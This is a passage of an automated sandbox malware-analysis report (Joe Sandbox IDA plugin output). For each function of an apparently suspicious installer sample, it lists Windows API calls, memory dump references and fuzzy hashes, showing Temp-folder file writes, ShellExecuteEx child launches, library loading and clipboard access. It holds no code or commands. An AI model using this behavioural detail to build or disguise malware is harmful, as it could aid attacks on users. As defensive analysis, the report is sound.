                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2962429428-3081826266
                                              • Opcode ID: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                              • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
                                              • Opcode Fuzzy Hash: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                              • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
                                              APIs
                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,004032B5,000000FF,00000000,00000000,0040A230,?), ref: 0040332E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                              • Instruction ID: fc1c1b99c1c3d1c2481461a51282f6204a9bfe71311cf5a9819f6edaa66b9ece
                                              • Opcode Fuzzy Hash: a028361fc9e97e52d64351f184ba52d3dd7daec5df95744dc32eca756b6c47e1
                                              • Instruction Fuzzy Hash: C6319F70200219EFDB11CF55ED84A9E3FA8FB00355B20443AF905EA1D1D778DE51DBA9
                                              APIs
                                                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                • Part of subcall function 00405A73: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                              • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID:
                                              • API String ID: 1892508949-0
                                              • Opcode ID: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
                                              • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
                                              • Opcode Fuzzy Hash: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
                                              • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
                                              APIs
                                                • Part of subcall function 00405B68: ShellExecuteExW.SHELL32(?), ref: 00405B77
                                                • Part of subcall function 004069DC: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069ED
                                                • Part of subcall function 004069DC: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406A0F
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                              • String ID: @
                                              • API String ID: 165873841-2766056989
                                              • Opcode ID: 0b6079bd73865ef930fa3f780708b73cc8419f12f9e7f45310d544a7ab76ebce
                                              • Instruction ID: 5b26e3c0ac9ec09cc99971800e1024144e0173795a14c6037ac54a620244b577
                                              • Opcode Fuzzy Hash: 0b6079bd73865ef930fa3f780708b73cc8419f12f9e7f45310d544a7ab76ebce
                                              • Instruction Fuzzy Hash: 93112871A002189ACB10EFB9CA49B8DB7F0AF18304F20457AE555F72C2DBBC89459B18
                                              APIs
                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                              • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
                                              • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                              • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                                • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                                • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                                                • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                              • String ID:
                                              • API String ID: 2547128583-0
                                              • Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                              • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
                                              • Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                              • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                              • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                              • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryErrorLast
                                              • String ID:
                                              • API String ID: 1375471231-0
                                              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                              • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
                                              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                              • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
                                              APIs
                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F90B,0040CEF0,00403511,0040CEF0,0040F90B,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                              • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                              • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
                                              APIs
                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                              • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                              • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
                                              APIs
                                              • ShellExecuteExW.SHELL32(?), ref: 00405B77
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID:
                                              • API String ID: 587946157-0
                                              • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                              • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                              • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                              • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00405741
                                              • GetDlgItem.USER32(?,000003EE), ref: 00405750
                                              • GetClientRect.USER32(?,?), ref: 0040578D
                                              • GetSystemMetrics.USER32(00000002), ref: 00405794
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
                                              • ShowWindow.USER32(?,00000008), ref: 00405830
                                              • GetDlgItem.USER32(?,000003EC), ref: 00405851
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
                                              • GetDlgItem.USER32(?,000003F8), ref: 0040575F
                                                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                              • GetDlgItem.USER32(?,000003EC), ref: 004058A3
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
                                              • CloseHandle.KERNEL32(00000000), ref: 004058B8
                                              • ShowWindow.USER32(00000000), ref: 004058DC
                                              • ShowWindow.USER32(?,00000008), ref: 004058E1
                                              • ShowWindow.USER32(00000008), ref: 0040592B
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
                                              • CreatePopupMenu.USER32 ref: 00405970
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405984
                                              • GetWindowRect.USER32(?,?), ref: 004059A4
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
                                              • OpenClipboard.USER32(00000000), ref: 00405A05
                                              • EmptyClipboard.USER32 ref: 00405A0B
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
                                              • GlobalLock.KERNEL32(00000000), ref: 00405A21
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
                                              • CloseClipboard.USER32 ref: 00405A66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
